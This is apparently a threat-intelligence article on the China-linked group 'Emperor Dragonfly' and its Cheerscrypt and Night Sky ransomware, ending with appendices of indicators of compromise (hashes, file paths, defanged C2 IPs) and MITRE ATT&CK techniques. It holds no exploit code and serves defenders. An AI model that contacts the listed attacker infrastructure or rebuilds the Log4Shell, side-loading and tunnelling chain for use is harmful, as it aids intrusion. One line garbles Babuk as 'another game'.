Skip to main content

A Chinese hacking group known as “Emperor Dragonfly” has been linked to the Cheerscrypt ransomware, and they are known to frequently switch between ransomware families to avoid being caught. Since 2021, the ransomware group has been observed employing multiple ransomware families under various aliases, including Bronze Starlight (Secureworks) and DEV-0401 (Microsoft).

Though it appears that the hacking group is running a ransomware operation, prior research has shown that many of their victims are of interest to the Chinese government. Researchers have concluded that the hacking group’s ransomware activities may be a front for Chinese government-sponsored cyber espionage.

Night Sky and Cheerscrypt

Sygnia’s security experts determined during an incident response earlier this year that the attackers used the Apache ‘Log4Shell’ Log4j vulnerability (CVE-2021-44228) to execute PowerShell commands, which in turn initiates the DLL-sideloading technique typical of Night Sky TTPs. Then, they planted a Cobalt Strike beacon linked to a Command and Control (C2) address normally used for Night Sky operations. Attackers used a modified version of the Aliyun OSS keylogger, a modified version of the ‘IOX’ port-forwarding and proxy tool, and a modified version of the ‘NPS’ tunnelling tool, all of which are Go tools that are rarely seen in the ransomware space. While the attack followed the same pattern of reconnaissance and lateral movement as previous Night Sky attacks, the ransomware strain used to encrypt Windows and Linux ESXi machines was not Night Sky but rather Cheerscrypt.Overlap between the two ransomware strains

Overlap between the two ransomware strains

In May of 2022, researchers at Trend Micro discovered an encryptor for VMware ESXi servers, which they later dubbed the “Cheers” ransomware. The hackers, like other enterprise-focused ransomware groups, break into systems, steal data, and encrypt devices. This information is then used in a second extortion attempt before the victim is finally forced to pay the demanded ransom. Below is an example of a data leak website that would be used if a ransom was not paid.

Cheerscrypt dark web leak site with the flag of Ukraine and the Ukrainian national salute

Frequently switching ransomware strains

Sygnia claims that Cheerscrypt is just another example of Emperor Dragonfly’s ongoing campaign of rebranding its payload in an attempt to avoid being traced. Rather than acting as a RaaS (Ransomware-as-a-Service) platform for affiliates, the ransomware group is acting as a solitary “lone wolf” in the cybercriminal underworld. According to a report published by Secureworks in June 2022, the threat actor uses ransomware families such as Night Sky, Rook, Pandora, and AtomSilo to disguise government-sponsored cyberespionage campaigns as financially motivated attacks. The same month, Microsoft added the hacking group they call DEV-0401 to a list of ransomware operations and said they were likely Chinese threat actors.

The Microsoft threat intelligence researchers noted that DEV-0401 “appears to be an activity group involved in all stages of their attack lifecycle,” beginning with gaining access to compromised systems and ending with the creation of ransomware. However, “they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads,” as one researcher put it. When compared to other human-operated ransomware threat actors tracked by Microsoft, DEV-0401 stands out as the only group that is indeed based in China. They were constantly changing ransomware families, as discovered by both Secureworks and Microsoft, and these families included LockFile and LockBit 2.0 among others.

There are many similarities between the code bases of Night Sky, Pandora, and Rook, all of which are based on the stolen source code of another game called Babuk. Trend Micro has also stated that Cheerscrypt appears to be based on Babuk, so the pieces seem to fit together. Whatever the true motivations of the group known as “Emperor Dragonfly,” exploiting vulnerabilities in publicly accessible servers on the Internet is a common tactic, so it is critical to install all available security patches as soon as possible. Since this organization is known to exploit the Log4j flaw in VMware Horizon servers, deploying the latest patches for these devices should be a top priority.

Defending Against Emperor Dragonfly

APPENDIX I: INDICATORS OF COMPROMISE 

 Cobalt Strike Beacons 

MD5 Description File Name 
37011eed9de6a90f3be3e1cbba6c5ab2Encrypted Cobalt Strike payloadC:\Windows\Help\OEM\ContentStore\vlcplayer.dat
37011eed9de6a90f3be3e1cbba6c5ab2Encrypted Cobalt Strike payloadC:\Windows\Help\OEM\ContentStore\vlcplayer.dat
37011eed9de6a90f3be3e1cbba6c5ab2Encrypted Cobalt Strike payloadC:\Windows\Help\OEM\ContentStore\vlcplayer.dat
2893d476408e23b7e8a65c6898fe43faEncrypted Cobalt Strike payloadC:\Windows\Help\Corporate\auth.dat
 8161d8339411ddd6d99d54d3aefa2943Encrypted Cobalt Strike payloadC:\Windows\debug\debug.dat
 5a852305ffb7b5abeb39fcb9a37122ffWeaponized DLL loaded by vlc.exeC:\Windows\Help\Corporate\libvlc.dll
 f0656e3a70ab0a10f8d054149f12c935Encrypted Cobalt Strike payloadC:\Windows\Help\Corporate\auth.dat
 37011eed9de6a90f3be3e1cbba6c5ab2Encrypted Cobalt Strike payloadC:\Windows\Help\Corporate\vlcplayer.dat

Go Tools

MD5 Description File Name 
5695de561a065123178067fcedf39ce3NPC client for NPS tunnel toolC:\Windows\Help\mui\0409\WindowsUpdate.exe
 ea4ca87315d14f5142aaef1f5e287417KeyloggerC:\Windows\Help\OEM\ContentStore.exe
 5a6008cf994779cde1698a0e80bb817dIOX port forwarder and proxyC:\Windows\Help\Windows\dec.exe

 Additional Artifacts


 Artifact

Description 
GrPpQGgI4se5fTIRkxBj/nfbcPvfJWpyY5EtRD0hf/CW9u6cXM4f4VKyyzaHJG/OLcdjB95YaMDP6Y1d-MgGo Build ID of NPS client-side binary (WindowsUpdate.exe)
GriAm-TYSQig04-nXbTE/9gsYQSitnL9GPHKgpNUX/Go Build ID of the keylogger (ContentStore.exe)
QA-vmpyo7vFHuU7RQ\ Y/ _NwncoU6QsMYGeukgxTd 
 System Service UpdateService name; persistency mechanism for NPS client-side binary
 C85A6814B99C8302AF484563D47D9658MD5 hash of SharpShares, an open-source tool to enumerate shares
07d14d16d21d21d00042d41d00041d47e4e0ae17960b2a5b4fd6107fbb0926JARM hash of the Cobalt Strike C&C servers

 Network Indicators

 IP Address Description  URL
 207[.]148[.]122[.]171C&C serverapi[.]rogerscorp[.]org
 139[.]180[.]217[.]203C&C server (Cobalt Strike Beacon was downloaded from this IP) 
 178[.]128[.]102[.]13Cobalt Strike C&C server 
 139[.]59[.]243[.]219Cobalt Strike C&C server 
 128[.]199[.]151[.]146NPS server 

 Legitimate Executables  

MD5 Description File Name 
322ead69300501356b13d751165daaSigned McAfee file used to side-load LockDown.dll c:\Windows\debug\mfeann.exe
51be3e3a8101bc4298b43a64540c422bSigned FortiClient file used to side-load utilsdll.dllC:\Windows\Help\Corporate\FCAuth.exe  
e2904f5301b35b2722faf578d1f7a4d4Signed VLC file used to side-load libvlc.dllC:\Windows\Help\Corporate\vlc.exe

APPENDIX II: MITRE ATT&CK TTPS

  1. Initial Access
    1. T1190: Exploit Public-Facing Application
  2. Execution
    1. T1059.001: Command and Scripting Interpreter: PowerShell
    2. T1059.003: Command and Scripting Interpreter: Windows Command Shell
    3. T1047: Windows Management Instrumentation
    4. T1569.002: System Services: Service Execution
  3. Persistence
    1. T1543.003: Create or Modify System Process: Windows Service
  4. Defense Evasion
    1. T1027.002: Obfuscated Files or Information: Software Packing
    2. T1574.002: Hijack Execution Flow: DLL Side-Loading
    3. T1070.004: Indicator Removal on Host: File Deletion
  5. Discovery
    1. T1135: Network Share Discovery
    2. T1087.002: Account Discovery: Domain Account
    3. T1082: System Information Discovery
    4. T1016: System Network Configuration Discovery
  6. Lateral Movement
    1. T1570: Lateral Tool Transfer
    2. T1021.001: Remote Services: Remote Desktop Protocol
  7. Collection
    1. T1039: Data from Network Shared Drive
    2. T1056.001: Input Capture: Keylogging
  8. Command & Control
    1. T1090: Proxy
    2. T1095: Non-Application Layer Protocol
    3. T1572: Protocol Tunneling
    4. T1071.001: Application Layer Protocol: Web Protocols
    5. T1132.001: Data Encoding: Standard Encoding
    6. T1573: Encrypted Channel
  9. Exfiltration
    1. T1048: Exfiltration Over Alternative Protocol
    2. T1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage
  10. Impact
    1. T1486: Data Encrypted for Impact

Contributors: Oren Biderman, Amnon Kushnir, Noam Lifshitz, Ori Porag, Yoav Mazor, Erez Kalman, Haim Nachmias

Leave a Reply